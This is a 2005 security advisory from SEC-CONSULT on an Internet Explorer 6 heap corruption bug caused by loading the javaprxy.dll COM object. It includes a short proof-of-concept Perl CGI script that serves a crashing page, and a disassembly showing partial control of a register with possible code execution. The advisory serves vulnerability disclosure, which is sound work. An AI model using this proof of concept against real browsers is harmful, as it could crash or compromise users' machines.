SEC-CONSULT Security Advisory < 20050629-0 > ================================================================================== title: IE6 javaprxy.dll COM instantiation heap corruption vulnerability program: Internet Explorer vulnerable version: 6.0.2900.2180 homepage: www.microsoft.com found: 2005-06-17 by: sk0L & Martin Eiszner / SEC-CONSULT / www.sec-consult.com ================================================================================== background: --------------- Internet Explorer supports instantiation of non-ActiveX controls, e.g COM objects, via tags. according to M$, COM components respond gracefully to attempts to treat them as non-ActiveX controls. on the contrary, we found that at least 20 of the objects available on an average XP system either lead to an instant crash or an exception after a few reloads. vulnerability overview: --------------- Loading HTML documents with certain embedded CLSIDs results in null-pointer exceptions or memory corruption. in one case, we could leverage this bug to overwrite a function pointer in the data segment. it *may* be possible to exploit this issue to execute arbitrary code in the context of IE. proof of concept: --------------- this simple CGI should crash IE. --------------- #!/usr/bin/perl # in order for this to work javaprxy.dll must be available on the client. my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0'; # javaprxy.dll my $html1 = "\n\n"; my $html2 = "\n\n"; print "Content-Type: text/html;\r\n\r\n"; print $html1.("A"x30000).$html2; --------------- on our lab machine, we, end up with eax=00410041, and an exception occurs at the following location in javaprxy.dll: --------------- .text:7C508660 mov eax, [ecx] .text:7C508662 test eax, eax .text:7C508664 jz short locret_7C50866C .text:7C508666 mov ecx, [eax] .text:7C508668 push eax .text:7C508669 call dword ptr [ecx+8] --------------- as you can see, this situation may be exploitable, considering that we have some level of control over eax. vulnerable versions: --------------- javaprxy.dll 5.00.3810 internet explorer 6.0.2900.2180.xpsp_sp2_gdr.050301-1519 these are the versions tested, other versions may of course be vulnerable. vendor status: --------------- vendor notified: 2005-06-17 vendor response: 2005-06-17 patch available: ? microsoft does not confirm the vulnerability, as their product team can not reproduce condition. however, they are looking at making changes to handle COM objects in a more robust manner in the future. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ < Bernhard Müller / Martin Eiszner > / www.sec-consult.com / SGT ::: walter|bruder, flo, tke, dfa :::